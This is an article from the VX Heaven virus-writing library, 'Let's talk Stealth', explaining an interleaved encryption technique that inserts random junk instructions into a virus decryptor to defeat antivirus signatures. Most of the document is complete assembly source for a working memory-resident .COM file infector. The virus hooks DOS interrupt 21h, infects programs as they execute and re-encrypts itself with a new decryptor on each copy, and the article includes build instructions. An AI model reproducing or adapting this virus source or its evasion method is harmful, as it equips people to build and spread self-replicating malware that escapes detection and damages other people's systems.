Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Let's talk Stealth

Stomach Contents

[Back to index] [Comments]

Hello Kiddies.. Stomach has something tasty for you to chew on, but first:

DISCLAIMER

I take absolutely no responsibility for the use/misuse of the information and/or source code in this document. By using the information/source code in this document YOU are agreeing to take full responsibility for any consequence of using this information.

IET - Interleaved Encryption Technique.

The concept is so simple, it's really not much to shout about, however, it's potential for dodging AV's is enormous.

Basically the idea is not to replace XOR encryption or the like, but to compliment it. The purpose of IET in fact, is to protect the decryption code. It's a mutualistic relationship.

Step (1): IET encoded decryption routine (unscannable) decrypts the rest of the virus code (unscannable)

Step (2): Decrypted virus code encrypts the replicated virus with new unique IET code.

So the IET code serves the purpose of encoding the decoding code, and the decoded code serves the purpose of re-IET-encoding the decryption algorithm.

"You encode my back, I'll encode yours" so too speak.

So what does the common AV have to go on now? NOTHING. It won't be able to find a single string of bytes in the IET code longer than perhaps 1 instruction, so it's useless there, and it won't be able to find a single string of bytes in the encrypted portion, because the encryption key will always change.

Ok, so how do we do it? Well the method simply interleaves each instruction with another randomly chosen instruction. Take your standard XOR decryption code..

      mov     si, offset EncryptedCode
      mov     bx, Key
      mov     cx, BytesToEncrypt
Decrypt:
      xor     [si],bx
      inc     si
      inc     si
      loop    Decrypt
EncryptedCode:
      ...                      ; Safe from here on..
      ...
      ...

Now, create a list of instructions which do nothing, or use registers not used in the decryption code, and their lengths.

InstructionList:
 ...  db     3           ; length of instruction..
      add    ax,0        ; instruction..
      db     1
      inc    ax
      db     1
      cld
      db     1
      std
      db     3
      adc    ax,0
      db     2
      or     al,al
      db     2
      or     ah,ah
      db     2
      or     si,si

Also insert a copy of the decryption code, also with instruction lengths interleaved in the code..

DecryptionCodeTemplate:
      db      3
      mov     si, offset EncryptedCode
      db      5
      mov     bx, cs:Key
      db      3
      mov     cx, BytesToEncrypt
Decrypt:
      db      2
      xor     [si],bx
      db      1
      inc     si
      db      1
      inc     si
      db      2
      loop    Decrypt
 EncryptedCode:

Now it's simply a bit of coding to scan through the DecryptionCodeTemplate, copy 1 instruction to the new IET code block, then selected a random instruction from the InstructionList and inserting it, then fetching another instruction from the DecryptionCodeTemplate and then fetching another one from the the InstructionList.. and so on and so on.

Once the code is "rendered" you will have something that may look like:

      or      al, al
      mov     si, offset EncryptedCode
      adc     ax, 0
      mov     bx, cs:Key
      or      si, si
      mov     cx, BytesToEncrypt
Decrypt:
      or      si, si
      xor   [si], bx
      inc     ax
      inc     si
      cld
      inc     si
      add     ax, 0
      loop    Decrypt
 EncryptedCode:

As you can see, this is just 1 of 2,097,152 variations (7 insertion points, 8 different instructions). You could even write code which dumps a random number of instructions at each insertion point. It might be a good idea to make the decryption algorithm a little more complicated as well.

Remember that the InstructionList and the DecryptionCodeTemplate is safely tucked away in the encrypted portion of the virus, which means there is nothing an AV can get it's hands on.

THE PROBLEM WITH IET

Ok, by now you might have noticed a slight snag in the concept. The relative jump or LOOP should I say at the end, and the reference to the EncryptedCode label. Due to the undetermined size of the decryption code, the LOOP will be out, and so will the EncryptedCode label, but that hardly poses a problem. A wee bit of self editing code will sort that out, and is definitely not going to vex a hardened virus coder.

TECHNIQUES - GETTING A WEE BIT MORE DEVIOUS

Ok, so you've written your first IET-utilizing virus, now what? Well to make things a little more interesting, and a lot more aggrevating to the general AV croud, you might want to try one of the following:

OK, SO YOU WAN'T SOME SOURCE CODE

This is a wee .COM file infector that I whipped together to test IET. It works. I have modified it from a bigger version to make things easier to understand for you learners out there. If you see funny things like "Padding end of file", just bare with me.. ignore it.

There is no payload, as I don't believe in malicious virii. There's no challenge in being destructive. Anyway.. here we go..

----------------CUT HERE------------------------------------

VirusCode     SEGMENT  PARA  'CODE'
              ASSUME   CS:VirusCode, DS:VirusCode

              ORG      100h

              .286

InstructionListSize           =  8
SizeOfVirus                   = OFFSET EOV - OFFSET VirusStart
SizeOfVirusInPara             = (SizeOfVirus / 16) + 1
WordsToDecrypt                =  ( SizeOfVirus / 2) + 1
DecryptionCodeTemplateLength  =  10 ; instructions
PreferedSize                  =  3200

; IET code will be written here, protecting the code ahead. Everything beyond
; this point is XOR encrypted, ie. Safe.

VirusStart:
              call    GetIP
GetIP:
              pop     si
              sub     si, 3
              mov     bp, cs
              mov     ax, bp
              dec     ax
              mov     ds, ax
              mov     bx, ds:[3]                ; BX = Para's of 'Z' block
              sub     bx, SizeOfVirusInPara * 2
              mov     dx, bx                   ; DX = modification to 'Z'
block
              dec     dx
              push    ax
              mov     ax,02e2eh
              int     21h ; installation check. ax=0 if already installed
              or      ax,ax
              pop     ax
              jz      DontTSR
              mov     ds:[3],dx
DontTSR:
              add     bx, ax
              inc     bx
              mov     es, bx
              xor     di, di
              push    cs
              pop     ds
              mov     cx, OFFSET EoV - OFFSET VirusStart
              rep     movsb  ; copy virus to high memory..
              sub     bx, 10h
              push    bx
              push    OFFSET EntryHigh
              retf

EntryHigh:
              push    ds
              mov     ax,word ptr cs:OldBytes
              mov     ds:[0100h],ax
              mov     al,byte ptr cs:OldBytes[2]
              mov     ds:[0102h],al
              xor     ax,ax
              mov     ds,ax
              mov     ax,02e2eh
              int     21h
              or      ax,ax
              jz      NoHook
              mov     ax,ds:[21h*4]
              mov     word ptr cs:Old21,ax
              mov     ds:[21h*4],offset Hook21
              mov     ax,ds:[21h*4+2]
              mov     word ptr cs:Old21[2],ax
              mov     ds:[21h*4+2],cs
NoHook:
              pop     ax
              mov     ds,ax
              mov     es,ax
              push    ax
              mov     ax,0100h
              push    ax
              retf

OldBytes      db      0CDh, 020h, 00h
NewBytes      db      0E9h, 0, 0
Old21         dd      ?
FAttr         dw      ?
FDateTime     dw      ?
              dw      ?
PrefSize      dw      ?

int21         macro
              int     21h
              endm

Hook21:
              cmp     ax,02e2eh
              jne     Poop
              xor     ax,ax
              iret
Poop:
              cmp     ax, 4b00h
              je      InfectTime
Bail:
              jmp     dword ptr cs:Old21

InfectTime:
              push    ds
              push    es
              pusha
              mov     ax,4300h
              int21 ; Get file attributes
              mov     cs:FAttr,cx
              mov     ax,4301h
              xor     cx,cx
              int21 ; Set file attributes
              mov     ax,3d02h
              int21 ; Open executable..
              mov     bx,ax ; bx=file handle
              mov     ax,4301h
              mov     cx,cs:FAttr
              int21 ; Reset file attributes
              push    cs
              pop     ds
              mov     ax,5700h
              int21 ; Get file date & time
              mov     FDateTime,cx
              mov     FDateTime[2],dx
              mov     al,cl
              and     al,1fh
              cmp     al,3 ; seconds=6, file already infected.
              je      AlreadyInfected
              mov     ah,3fh
              mov     dx,offset OldBytes
              mov     cx,3  ; read first 3 bytes..
              int21
              cmp     word ptr OldBytes, "ZM"
              je      AlreadyInfected    ; Not really, just doesn't do .exe's
              mov     ax,4202h
              cwd                ; dx=0
              xor     cx,cx      ; cx=0
              int21
              sub     ax,3
              mov     word ptr NewBytes[1],ax
              call    RenderIETCode
              mov     ah,40h
              mov     cx,di
              mov     dx,offset IETBuffer
              sub     cx,dx
              push    cx ; save size of IET code
              int21 ; Write IET code
              mov     ah,40h
              mov     cx,SizeOfVirus
              mov     dx,Offset EOV
              int21 ; Write virus..
              mov     cx,PreferedSize
              pop     ax ; ax=size of IET code
              sub     cx,ax
              sub     cx,SizeOfVirus
              mov     ah,40h
              mov     dx,Offset EOV
              int21 ; Pad end of virus to keep constant size
              xor     cx,cx
              xor     dx,dx
              mov     ax,4200h
              int21 ; Seek to BOF.
              mov     ah,40h
              mov     cx,3
              mov     dx,offset NewBytes
              int21 ; Write new jump code.
              and     FDateTime,0ffe0h
              or      FDateTime,3 ; seconds=6 -> infected file
AlreadyInfected:
              mov     ax,5701h
              mov     cx,FDateTime
              mov     dx,FDateTime[2]
              int21 ; Reset file date/time
              mov     ah,3eh
              int21 ; Close file.
              popa
              pop     es
              pop     ds
              jmp     Bail

IETBuffer     db      60 dup (0)

RenderIETCode:
; OUT:   di -> end of code in IETBuffer

              cld
              push    ds
              push    es
              push    bx
              push    cs
              xor     ax, ax
              mov     ds, ax
              mov     bp, ds:[046ch] ; bp = random#
              pop     si
              mov     es,si
              mov     ds,si
              mov     di, OFFSET EOV
              mov     si, 0100h
              mov     cx, WordsToDecrypt
EncryptLoop:
              lodsw
              xor     ax,bp
              stosw
              loop    EncryptLoop
              mov     word ptr ds:[OFFSET DCT_Key - 2],bp

              mov     di, OFFSET IETBuffer
              mov     si, OFFSET DecryptionCodeTemplate
              mov     dx, DecryptionCodeTemplateLength
              xor     ch, ch
              xor     ah, ah

RenderNextInstruction:
              mov     bx, OFFSET InstructionList
              mov     cx, bp
              rol     bp, 1
              xor     bp, 1234h
              and     cx, 7      ; mods to 0-7
              jz      Code0
Grabnext:
              mov     al, [bx]   ; al=instruction length
              inc     bx
              add     bx, ax
              loop    GrabNext
Code0:
              mov     cl, [bx]
              inc     bx
              push    si
              mov     si, bx
              rep     movsb
              pop     si

              cmp     dx, 9
              jne     CheckMark7
              mov     Mark9, di
CheckMark7:
              cmp     dx, 7
              jne     CheckMark4
              mov     Mark7, di
CheckMark4:
              cmp     dx, 4
              jne     DontMark
              mov     Mark4, di
DontMark:
              lodsb             ; get instruction length..
              mov     cl, al
              rep     movsb     ; copy instruction (DCT)

              dec     dx
              jnz     RenderNextInstruction

              mov     ax, Mark4
              sub     ax, di
              mov     es: [di - 1],ax     ; edit loop
              mov     bx, di
              sub     bx, Mark9
              mov     si, Mark7
              inc     si
              inc     si
              sub     bx, 3
              mov     es:[si], bx     ; edit offset
              pop     bx
              pop     es
              pop     ds
              ret

DecryptionCodeTemplate:
              db      1
              cld                            ; 10
              db      3
              call    $+3                    ; 9
              db      1
              pop     si                     ; 8
              db      4
              add     si, 1234h              ; 7
              db      3
              mov     bx, 0000h              ; 6
DCT_Key:
              db      3
              mov     cx, WordsToDecrypt     ; 5
DecryptT:
              db      2
              xor     [si], bx               ; 4
              db      1
              inc     si                     ; 3
              db      1
              inc     si                     ; 2
              db      2
              loop    DecryptT               ; 1

InstructionList:
              db      3           ; length of instruction..
              add     ax,0        ; instruction..
              db      1
              inc     ax
              db      1
              cld
              db      3
              and     ax,07fffh
              db      3
              adc     ax,0
              db      2
              or      al,al
              db      2
              or      ah,ah
              db      2
              or      si,si

Key           dw      0000h
Mark9         dw      ?
Mark7         dw      ?
Mark4         dw      ?

EOV:

VirusCode  ENDS
           END VirusStart

----------------CUT HERE--------------------------------------

Ok.. I assembled this with:

	TASM IETV.ASM
	TLINK -T IETV

The .COM created need not be modified to run. It's run-ready. All you have to do is infect a file with it, reset your PC, go in with a debugger and take a look at the code it creates.

ANOTHER DISCLAIMER

Assemble this code at your own risk. I won't be held liable for any damage caused to your or any other PC or constituents thereof.

I would recommend only assembling this and executing it if you feel experienced enough to control the situation.

CHEERIO FELLOW CODERS

Well that's it for now, I'm hungry! Hope this inspires you to incorporate IET into your own NON-MALICIOUS FRIENDLY creations. Anyone got any other kuhl ideas?

(Where'd The Analyst Go?)

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua